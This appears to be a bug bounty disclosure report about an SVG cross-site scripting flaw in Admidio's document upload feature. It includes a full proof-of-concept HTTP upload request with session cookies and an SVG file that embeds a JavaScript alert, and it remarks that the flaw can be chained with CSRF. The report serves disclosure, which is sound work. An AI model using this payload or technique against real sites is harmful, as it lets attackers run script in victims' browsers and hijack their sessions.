Description

Am still able to reproduce the SVG-XSS vulnerability here https://huntr.dev/bounties/96221dff-0d40-4326-9a9e-f66608307980/ on my local system (just downloaded the latest release on the website. Think you may have accidentally included SVG files into the whitelist.

Proof of Concept

POST /admidio/adm_program/system/file_upload.php?module=documents_files&mode=upload_files&id=6 HTTP/1.1
Host: 10.0.2.15
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------105596666835784551932184244642
Content-Length: 571
Origin: http://10.0.2.15
Connection: close
Referer: http://10.0.2.15/admidio/adm_program/system/file_upload.php?module=documents_files&id=6
Cookie: ADMIDIO_INSTALLATION_SESSION_ID=ajhu2uaaoaha7fk8vpdv165kao; ADMIDIO_abc_db_adm_SESSION_ID=r1pltsf7bp9fodrffonheefdnd; 'ADMIDIO_abc_db_adm_cookieconsent_status=dismiss; OJSSID=4bbfi99a73d9r0f5jm94irg6ls; PHPSESSID=3l4k4gsg30qn5ed2al4un9l5j7


-----------------------------105596666835784551932184244642
Content-Disposition: form-data; name="files[]"; filename="payload.svg"
Content-Type: image/svg+xml
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>
-----------------------------105596666835784551932184244642--

Impact

This vulnerability is capable of reflected XSS via upload of malicious SVG files

Note: Can be chained with CSRF to perform XSS without the need of upload privileges.